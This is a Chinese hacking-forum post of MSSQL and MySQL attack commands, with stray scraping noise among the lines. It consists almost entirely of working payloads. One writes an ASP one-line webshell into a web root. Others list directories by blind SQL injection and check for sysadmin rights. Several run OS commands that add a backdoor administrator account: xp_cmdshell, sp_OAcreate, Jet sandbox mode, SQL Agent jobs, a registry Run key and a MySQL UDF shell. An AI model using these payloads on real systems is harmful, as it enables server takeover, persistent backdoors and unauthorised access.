中国网络渗透测试联盟

标题: mssql实用命令及导出一句话 [打印本页]

作者: admin    时间: 2012-9-13 17:49
标题: mssql实用命令及导出一句话
MSSQL语句导出一句话木马
& H/ {/ K9 w( {首先确定网站的WEB路径; n3 ]" D$ H9 d5 A
;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马
: t3 q5 D: V4 D$ x- c1 J) i. q1 z  I5 }' i* _# H% W8 ^! r$ v
;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');--
3 p* q* a! F% t7 X; B//将一句话木马插入表中
5 a* q  n7 n$ n+ ?) d! b. Y9 t) m) P' E, k$ Q
;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';--
5 }  j8 ^7 O  e2 p//导出一个ASP文件3 ~( g6 O- q) V' ]0 ]/ X
9 @) v8 w+ B8 p, Y
0 ?! T6 E2 E. g1 D+ ~$ D1 O
关于MSSQL列目录1 s. \% w- ~0 Q2 o: V9 d2 B
;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表, p/ D: `% _" G" Y* _1 Q$ g
Insert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表# _. Y& ~7 D5 l) a5 e4 d1 ~

; ~3 O; R6 I1 F- p3 q) u4 q# v- Aand (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录5 w  v' c; i+ r# P! u$ D
1 L/ B- ]( H. u2 P
And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段
" T- j7 v# P6 E4 r/ Y( F! g
) S$ X0 Y! V8 ?8 h1 a9 E9 pAnd (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符
" k- e+ u+ N* u# v/ r6 k0 O: \7 C4 J# H
: n/ F" D1 z  A
数据库版本和权限查看
& W1 B- \# Y% R* E- x3 oand 1=(select @@VERSION) //查看详细的数据库信息.3 j  O9 [& e8 f" n; l! h5 ~1 F1 s8 E
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA
  d# R" S/ O" h  eand 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER( _. H4 |, F% q2 z

0 y4 r& u- H5 f9 a9 d0 J' {3 M7 v
1.利用xp_cmdshell执行命令: s6 I% |. |: J/ G
exec master..xp_cmdshell 'net user rfire 123456 /add'
2 |, y8 I) U4 ?5 R, gexec master..xp_cmdshell 'net localgroup administrators rfire /add'$ T& X5 j2 G, q; k% |: t

& K$ ]8 t4 `; ]/ E恢复xp_cmdshell存储过程
! X7 n5 |; m" n( c" A5 XExec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'/ C6 M( V; V) A3 |  N
8 L! S6 r1 q+ |$ D! l0 }6 \
$ m  W/ y9 B. q
2.利用SP_OAcreate和SP_OAMETHOD执行命令$ G! a6 V; N* C/ z  }; A. C
在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下
& s# P0 d' u" A- k* ]  g/ ^6 a2 dDECLARE @shell INT //建立一个@shell实体
; L$ h5 X6 r& H; rEXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例7 ]- l* p9 _8 A3 H- T% f7 W
EXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例/ F/ R( E2 _0 g6 l2 Q) Z
6 L/ ]2 ?0 H9 m9 O

; ?0 j9 k, s& J3.利用沙盒模式
. C7 F' M2 d2 k+ ?+ C( J先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。
' R) L9 a3 C" w7 B0 m2 E+ v; \开启沙盒模式:+ A5 ]* g# J9 y* p/ k
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0( a. c+ a) b7 K( U3 U

' d, A8 B; C, M% u执行命令:% w* o  T( P6 p0 h- P/ V+ _+ [8 F$ j
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');4 U& n9 ^! k0 f6 {5 o# |

! R: n8 d9 q3 n8 P  L
& W$ l! k/ ?# I3 q2 C5 ~4.利用SQL代理执行命令
: [  k# P- n: ~0 T) \EXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务
& I1 M1 Z. E: l6 a# g- [7 I: l' f( w0 l
执行命令:
8 X" c# N% p! n9 n$ ?2 p! h4 Luse msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错3 y- Q. F; L2 c3 p  [" G) p
exec sp_add_job 'x'" D/ q9 D4 q! l: y% }% |1 ]
exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业" A: N$ \. v4 Q& i2 a
exec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业. ^) z5 g; S  @' u' D6 X  U
, T: d0 G! d: @- O3 N( l/ A1 m7 `2 `
. k- L- A! n1 y7 D3 M
5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)$ T0 G  [7 |. `( T8 w; _' l' v
EXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'
+ f, g& d4 a/ L  n
& T" @+ W/ s: @/ \2 e4 b! N1 M9 X& [0 p& H% a/ {- e6 _& J
6.MYSQL的命令执行' Q& B8 Z6 c, q1 i4 @
MYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)
9 k* O0 g$ x1 d* S  {首先要在su.php下导出c:\windows\udf.dll  s) V! z* F6 ]1 p9 A& `# u$ A
导出后执行创建自定义函数命令:
  s# [1 Y9 D3 S( p3 f1 {+ gCreate Function cmdshell returns string soname 'udf.dll'
: {$ r2 r* H4 \$ F# F执行命令+ ]4 |( n2 q* E: ], r0 z) h' y
select cmdshell('net user rfire 123456 /add')
" }8 S8 G: |4 w执行后删除函数 drop function cmdshell
+ M, e+ C, E0 U5 f




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2